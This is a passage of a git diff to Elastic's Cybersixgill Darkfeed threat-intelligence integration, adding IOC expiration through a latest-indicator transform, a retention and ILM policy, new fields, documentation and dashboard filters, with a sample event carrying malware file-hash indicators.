supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_cybersixgill/data_stream/threat/lifecycle.yml b/packages/ti_cybersixgill/data_stream/threat/lifecycle.yml new file mode 100644 index 00000000000..5a4af9095b7 --- /dev/null +++ b/packages/ti_cybersixgill/data_stream/threat/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "5d" diff --git a/packages/ti_cybersixgill/data_stream/threat/manifest.yml b/packages/ti_cybersixgill/data_stream/threat/manifest.yml index 58475a0f7a0..d1ebca62766 100644 --- a/packages/ti_cybersixgill/data_stream/threat/manifest.yml +++ b/packages/ti_cybersixgill/data_stream/threat/manifest.yml @@ -1,5 +1,6 @@ type: logs title: Cybersixgill Darkfeed Logs +ilm_policy: logs-ti_cybersixgill.threat-default_policy streams: - input: httpjson vars: @@ -15,6 +16,7 @@ streams: multi: false required: true show_user: true + secret: true - name: enable_request_tracer type: bool title: Enable request tracing @@ -44,6 +46,15 @@ streams: required: false show_user: false description: URL to proxy connections in the form of http\[s\]://:@: + - name: ioc_expiration_duration + type: text + title: IOC Expiration Duration + multi: false + required: true + show_user: true + default: "90d" + description: >- + Enforces all IOCs to expire after this duration since their creation time indicated in the feed. Use [Elasticsearch time units](https://www.elastic.co/guide/en/elasticsearch/reference/current/api-conventions.html#time-units) in days, hours, or minutes (e.g 10d) - name: interval type: text title: Interval diff --git a/packages/ti_cybersixgill/data_stream/threat/sample_event.json b/packages/ti_cybersixgill/data_stream/threat/sample_event.json index 9cd03108cb0..22ee5bf764f 100644 --- a/packages/ti_cybersixgill/data_stream/threat/sample_event.json +++ b/packages/ti_cybersixgill/data_stream/threat/sample_event.json @@ -1,14 +1,16 @@ { "@timestamp": "2021-12-07T13:58:01.596Z", "agent": { - "ephemeral_id": "a7e7cf45-534a-4104-b3c3-9b30d6ebeeb9", - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "ephemeral_id": "5b99e697-c059-40e4-9097-eb5a21a371c6", + "id": "49b0da18-7d53-4b44-9bda-940341f4fb0f", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.1" + "version": "8.12.1" }, "cybersixgill": { "actor": "vaedzy", + "deleted_at": "2021-12-17T13:58:01.596Z", + "expiration_duration": "10d", "feedname": "dark_web_hashes", "mitre": { "description": "Mitre attack tactics and technique reference" @@ -28,18 +30,18 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "id": "49b0da18-7d53-4b44-9bda-940341f4fb0f", "snapshot": false, - "version": "8.9.1" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-08-28T14:48:23.885Z", + "created": "2024-03-15T19:20:27.045Z", "dataset": "ti_cybersixgill.threat", - "ingested": "2023-08-28T14:48:24Z", + "ingested": "2024-03-15T19:20:27Z", "kind": "enrichment", "original": "{\"confidence\":70,\"created\":\"2021-12-07T13:58:01.596Z\",\"description\":\"Hash attributed to malware that was discovered in the dark and deep web\",\"extensions\":{\"extension-definition--3de9ff00-174d-4d41-87c9-05a27a7e117c\":{\"extension_type\":\"toplevel-property-extension\"}},\"external_references\":[{\"positive_rate\":\"medium\",\"source_name\":\"VirusTotal\",\"url\":\"https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\"},{\"description\":\"Mitre attack tactics and technique reference\",\"mitre_attack_tactic\":\"Build Capabilities\",\"mitre_attack_tactic_id\":\"TA0024\",\"mitre_attack_tactic_url\":\"https://attack.mitre.org/tactics/TA0024/\",\"source_name\":\"mitre-attack\"}],\"id\":\"indicator--302dab0f-64dc-42f5-b99e-702b28c1aaa9\",\"indicator_types\":[\"malicious-activity\"],\"lang\":\"en\",\"modified\":\"2021-12-07T13:58:01.596Z\",\"name\":\"4d0f21919d623bd1631ee15ca7429f28;5ce39ef0700b64bd0c71b55caf64ae45d8400965;7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\",\"pattern\":\"[file:hashes.MD5 = '4d0f21919d623bd1631ee15ca7429f28' OR file:hashes.'SHA-1' = '5ce39ef0700b64bd0c71b55caf64ae45d8400965' OR file:hashes.'SHA-256' = '7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d']\",\"pattern_type\":\"stix\",\"sixgill_actor\":\"vaedzy\",\"sixgill_confidence\":70,\"sixgill_feedid\":\"darkfeed_012\",\"sixgill_feedname\":\"dark_web_hashes\",\"sixgill_post_virustotallink\":\"https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\",\"sixgill_postid\":\"c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a\",\"sixgill_posttitle\":\"[病毒样本] #Trickbot (2021-12-07)\",\"sixgill_severity\":70,\"sixgill_source\":\"forum_kafan\",\"spec_version\":\"2.1\",\"type\":\"indicator\",\"valid_from\":\"2021-12-07T02:55:17Z\"}", "severity": 70, @@ -66,6 +68,7 @@ }, "first_seen": "2021-12-07T02:55:17.000Z", "last_seen": "2021-12-07T13:58:01.596Z", + "name": "7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d", "provider": "forum_kafan", "reference": "https://portal.cybersixgill.com/#/search?q=_id:c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a", "type": "file" @@ -82,4 +85,4 @@ ] } } -} +} \ No newline at end of file diff --git a/packages/ti_cybersixgill/docs/README.md b/packages/ti_cybersixgill/docs/README.md index 102994b191a..277b8e8e17b 100644 --- a/packages/ti_cybersixgill/docs/README.md +++ b/packages/ti_cybersixgill/docs/README.md @@ -8,6 +8,12 @@ This integration connects with the commercial [Cybersixgill Darkfeed](https://ww The Cybersixgill Darkfeed integration collects threat intelligence from the Darkfeed TAXII service available using the credentials provided from Cybersixgill. +#### Expiration of Indicators of Compromise (IOCs) +The ingested IOCs are expired after the duration configured by `IOC Expiration Duration` integration setting. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to faciliate only active IOCs be available to the end users. This transform creates destination indices named `logs-ti_cybersixgill_latest.dest_threat-*` which only contains active and unexpired IOCs. The latest destination index also has an alias named `logs-ti_cybersixgill_latest.threat`. When querying for active indicators or setting up indicator match rules, only use the latest destination indices or the alias to avoid false positives from expired IOCs. Dashboards are also pointing to the latest destination indices containing active IOC. Please read [ILM Policy](#ilm-policy) below which is added to avoid unbounded growth on source datastream `.ds-logs-ti_cybersixgill.threat-*` indices. + +#### ILM Policy +To facilitate IOC expiration, source datastream-backed indices `.ds-logs-ti_cybersixgill.threat-*` are allowed to contain duplicates from each polling interval. ILM policy `logs-ti_cybersixgill.threat-default_policy` is added to these source indices so it doesn't lead to unbounded growth. This means data in these source indices will be deleted after `5 days` from ingested date. + **Exported fields** | Field | Description | Type | @@ -27,6 +33,8 @@ The Cybersixgill Darkfeed integration collects threat intelligence from the Dark | container.labels | Image labels. | object | | container.name | Container name. | keyword | | cybersixgill.actor | The related actor for the indicator. | keyword | +| cybersixgill.deleted_at | The timestamp when indicator is (or will be) expired. | date | +| cybersixgill.expiration_duration | The configured expiration duration. | keyword | | cybersixgill.feedname | Name of the Threat Intel feed. | keyword | | cybersixgill.mitre.description | The mitre description of the indicator | keyword | | cybersixgill.title | The title of the indicator. | keyword | @@ -67,6 +75,8 @@ The Cybersixgill Darkfeed integration collects threat intelligence from the Dark | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Input type. | keyword | +| labels | Custom key/value pairs. Can be used to add meta information to events. Should not contain nested objects. All values are stored as keyword. Example: `docker` and `k8s` labels. | object | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | | message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | | tags | List of keywords used to tag each event. | keyword | | threat.feed.dashboard_id | Dashboard ID used for Kibana CTI UI | constant_keyword | @@ -79,6 +89,7 @@ The Cybersixgill Darkfeed integration collects threat intelligence from the Dark | threat.indicator.first_seen | The date and time when intelligence source first reported sighting this indicator. | date | | threat.indicator.ip | Identifies a threat indicator as an IP address (irrespective of direction). | ip | | threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format | keyword | | threat.indicator.provider | The name of the indicator's provider. | keyword | | threat.indicator.reference | Reference URL linking to additional information about this indicator. | keyword | | threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | @@ -102,14 +113,16 @@ An example event for `threat` looks as following: { "@timestamp": "2021-12-07T13:58:01.596Z", "agent": { - "ephemeral_id": "a7e7cf45-534a-4104-b3c3-9b30d6ebeeb9", - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "ephemeral_id": "5b99e697-c059-40e4-9097-eb5a21a371c6", + "id": "49b0da18-7d53-4b44-9bda-940341f4fb0f", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.1" + "version": "8.12.1" }, "cybersixgill": { "actor": "vaedzy", + "deleted_at": "2021-12-17T13:58:01.596Z", + "expiration_duration": "10d", "feedname": "dark_web_hashes", "mitre": { "description": "Mitre attack tactics and technique reference" @@ -129,18 +142,18 @@ An example event for `threat` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "id": "49b0da18-7d53-4b44-9bda-940341f4fb0f", "snapshot": false, - "version": "8.9.1" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-08-28T14:48:23.885Z", + "created": "2024-03-15T19:20:27.045Z", "dataset": "ti_cybersixgill.threat", - "ingested": "2023-08-28T14:48:24Z", + "ingested": "2024-03-15T19:20:27Z", "kind": "enrichment", "original": "{\"confidence\":70,\"created\":\"2021-12-07T13:58:01.596Z\",\"description\":\"Hash attributed to malware that was discovered in the dark and deep web\",\"extensions\":{\"extension-definition--3de9ff00-174d-4d41-87c9-05a27a7e117c\":{\"extension_type\":\"toplevel-property-extension\"}},\"external_references\":[{\"positive_rate\":\"medium\",\"source_name\":\"VirusTotal\",\"url\":\"https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\"},{\"description\":\"Mitre attack tactics and technique reference\",\"mitre_attack_tactic\":\"Build Capabilities\",\"mitre_attack_tactic_id\":\"TA0024\",\"mitre_attack_tactic_url\":\"https://attack.mitre.org/tactics/TA0024/\",\"source_name\":\"mitre-attack\"}],\"id\":\"indicator--302dab0f-64dc-42f5-b99e-702b28c1aaa9\",\"indicator_types\":[\"malicious-activity\"],\"lang\":\"en\",\"modified\":\"2021-12-07T13:58:01.596Z\",\"name\":\"4d0f21919d623bd1631ee15ca7429f28;5ce39ef0700b64bd0c71b55caf64ae45d8400965;7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\",\"pattern\":\"[file:hashes.MD5 = '4d0f21919d623bd1631ee15ca7429f28' OR file:hashes.'SHA-1' = '5ce39ef0700b64bd0c71b55caf64ae45d8400965' OR file:hashes.'SHA-256' = '7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d']\",\"pattern_type\":\"stix\",\"sixgill_actor\":\"vaedzy\",\"sixgill_confidence\":70,\"sixgill_feedid\":\"darkfeed_012\",\"sixgill_feedname\":\"dark_web_hashes\",\"sixgill_post_virustotallink\":\"https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\",\"sixgill_postid\":\"c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a\",\"sixgill_posttitle\":\"[病毒样本] #Trickbot (2021-12-07)\",\"sixgill_severity\":70,\"sixgill_source\":\"forum_kafan\",\"spec_version\":\"2.1\",\"type\":\"indicator\",\"valid_from\":\"2021-12-07T02:55:17Z\"}", "severity": 70, @@ -167,6 +180,7 @@ An example event for `threat` looks as following: }, "first_seen": "2021-12-07T02:55:17.000Z", "last_seen": "2021-12-07T13:58:01.596Z", + "name": "7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d", "provider": "forum_kafan", "reference": "https://portal.cybersixgill.com/#/search?q=_id:c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a", "type": "file" @@ -184,5 +198,4 @@ An example event for `threat` looks as following: } } } - ``` \ No newline at end of file diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/agent.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/base-fields.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..9b559d71a60 --- /dev/null +++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/base-fields.yml @@ -0,0 +1,37 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset name. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: dataset.type + type: constant_keyword + description: Dataset type. +- name: dataset.name + type: constant_keyword + description: Dataset name. +- name: dataset.namespace + type: constant_keyword + description: Dataset namespace. +- name: event.module + type: constant_keyword + description: Event module + value: ti_cybersixgill +- name: event.dataset + type: constant_keyword + description: Event dataset + value: ti_cybersixgill.threat +- name: threat.feed.name + type: constant_keyword + description: Display friendly feed name + value: Cybersixgill Darkfeed +- name: threat.feed.dashboard_id + type: constant_keyword + description: Dashboard ID used for Kibana CTI UI + value: ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738 +- name: "@timestamp" + type: date + description: Event timestamp. diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/ecs.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..e3fd02e3895 --- /dev/null +++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/ecs.yml @@ -0,0 +1,67 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.severity +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.url.full +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.url.extension +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.url.path +- external: ecs + name: threat.indicator.url.scheme +- external: ecs + name: threat.indicator.url.fragment +- external: ecs + name: threat.indicator.ip +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.reference +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.first_seen +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.tactic.name +- external: ecs + name: threat.tactic.id +- external: ecs + name: threat.tactic.reference +# Manually define this as a workaround for failing tests and validation +- name: threat.indicator.name + level: extended + type: keyword + description: The display name indicator in an UI friendly format diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/fields.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/fields.yml new file mode 100644 index 00000000000..24d37ab118d --- /dev/null +++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/fields.yml @@ -0,0 +1,39 @@ +- name: cybersixgill + type: group + fields: + - name: feedname + type: keyword + description: | + Name of the Threat Intel feed. + - name: title + type: keyword + description: | + The title of the indicator. + - name: actor + type: keyword + description: | + The related actor for the indicator. + - name: valid_from + type: date + description: | + At what date the indicator is valid from. + - name: virustotal.pr + type: keyword + description: | + The Virustotal positive rate. + - name: virustotal.url + type: keyword + description: | + The related Virustotal URL. + - name: mitre.description + type: keyword + description: | + The mitre description of the indicator + - name: deleted_at + type: date + description: | + The timestamp when indicator is (or will be) expired. + - name: expiration_duration + type: keyword + description: | + The configured expiration duration. diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/manifest.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/manifest.yml new file mode 100644 index 00000000000..f5296fd0c0a --- /dev/null +++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/manifest.yml @@ -0,0 +1,18 @@ +start: true +destination_index_template: + settings: + index: + sort: + field: + - "@timestamp" + order: + - desc + mappings: + dynamic: true + dynamic_templates: + - strings_as_keyword: + match_mapping_type: string + mapping: + ignore_above: 1024 + type: keyword + date_detection: false diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/transform.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/transform.yml new file mode 100644 index 00000000000..e288e30e501 --- /dev/null +++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/transform.yml @@ -0,0 +1,37 @@ +# Use of "*" to use all namespaces defined. +source: + index: + - "logs-ti_cybersixgill.threat-*" +# The version suffix on the dest.index should be incremented if a breaking change +# is made to the index mapping. You must also bump the fleet_transform_version +# for any change to this transform configuration to take effect. The old destination +# index is not automatically deleted. We are dependent on https://github.com/elastic/package-spec/issues/523 to give +# us that ability in order to prevent having duplicate IoC data and prevent query +# time field type conflicts. +dest: + index: "logs-ti_cybersixgill_latest.dest_threat-1" + aliases: + - alias: "logs-ti_cybersixgill_latest.threat" + move_on_creation: true +latest: + unique_key: + - event.dataset + - event.id + sort: '@timestamp' +description: Latest Indicator data retrieved from cybersixgill Darkfeed TAXII server. +frequency: 30s +sync: + time: + field: event.ingested + # Updated to 120s because of refresh delay in Serverless. With default 60s, sometimes transform wouldn't process all documents. + delay: 120s +retention_policy: + time: + field: cybersixgill.deleted_at + # Delete immediately after reaching the `deleted_at` timestamp. + max_age: 1m +_meta: + managed: true + # Bump this version to delete, reinstall, and restart the transform during package. + # Version bump is needed if there is any code change in transform. + fleet_transform_version: 0.1.0 diff --git a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738.json b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738.json index d92a13f17f6..9fd25519bf1 100644 --- a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738.json +++ b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738.json @@ -66,6 +66,25 @@ "data_stream.dataset": "ti_cybersixgill.threat" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "type": "exists" + }, + "query": { + "exists": { + "field": "labels.is_ioc_transform_source" + } + } } ], "query": { @@ -100,7 +119,7 @@ "description": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n[Cybersixgill Overview](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738) \n**[Cybersixgill Files (This Page)](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738)** \n[Cybersixgill URLs](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738) \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: file**.\n\nThe dashboard is made to provide general statistics and show the health of your indicators like hash type counters, popular domains, statistics about how many unique indicators are ingested and other relevant information.", + "markdown": "**Navigation**\n\n[Cybersixgill Overview](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738) \n**[Cybersixgill Files (This Page)](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738)** \n[Cybersixgill URLs](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738) \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: file**.\n\nThe dashboard is made to provide general statistics and show the health of your indicators like hash type counters, popular domains, statistics about how many unique indicators are ingested and other relevant information. The dashboard is made to provide general statistics and show the health of the ingestion of indicators from Cybersixgill. The dashboard only shows the active indicators that are not expired. The indicators are expired after the duration set by `IOC Expiration Duration` in the integration settings since the time they are created(`@timestamp`).", "openLinksInNewTab": false }, "title": "Files Navigation Textbox [Logs AbuseCH]", @@ -116,8 +135,7 @@ "y": 0 }, "panelIndex": "09ba3dc0-e2e2-4799-b47f-bb919bf290a1", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { @@ -188,8 +206,7 @@ }, "panelIndex": "31ea16d1-7591-42a7-b773-6fca00e5db14", "title": "Unique File Types [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -263,8 +280,7 @@ }, "panelIndex": "4d3e11dc-c4cc-4373-bb83-3d39fe6ffa98", "title": "Unique MD5 [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -365,8 +381,7 @@ }, "panelIndex": "c66ad183-f4f0-4605-b35d-85b7038403fd", "title": "Mitre Tactics ID [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -467,8 +482,7 @@ }, "panelIndex": "fcc44298-dfb6-4bd4-a63d-e845ce3eb859", "title": "Mitre Tactics Name [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -542,8 +556,7 @@ }, "panelIndex": "e9b6f0ad-5e6b-44da-923e-dc0d5ccfdfea", "title": "Unique SHA1 [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -617,8 +630,7 @@ }, "panelIndex": "93e32abe-87e3-469e-b7e9-a7ef7dfa2cce", "title": "Unique SHA256 [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -717,8 +729,7 @@ }, "panelIndex": "0638c316-a573-412f-b3c4-f72dde07c6e8", "title": "Top Feeds [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -855,8 +866,7 @@ }, "panelIndex": "6866585e-4589-4a7e-9763-3b2493f488e7", "title": "File Tags [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -957,20 +967,17 @@ }, "panelIndex": "256a7b33-485f-4715-90f3-768bea61d23e", "title": "Confidence Levels [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" } ], "timeRestore": false, "title": "[Logs Cybersixgill] Files", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-12T04:51:38.930Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-15T20:00:54.955Z", "id": "ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -987,6 +994,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "31ea16d1-7591-42a7-b773-6fca00e5db14:indexpattern-datasource-current-indexpattern", @@ -1076,7 +1088,13 @@ "id": "ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "name": "tag-ref-ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "type": "tag" + }, + { + "id": "ti_cybersixgill-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738.json b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738.json index 5ce1c3db7ca..f35fba3ea69 100644 --- a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738.json +++ b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738.json @@ -66,6 +66,25 @@ "threat.indicator.type": "url" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "type": "exists" + }, + "query": { + "exists": { + "field": "labels.is_ioc_transform_source" + } + } } ], "query": { 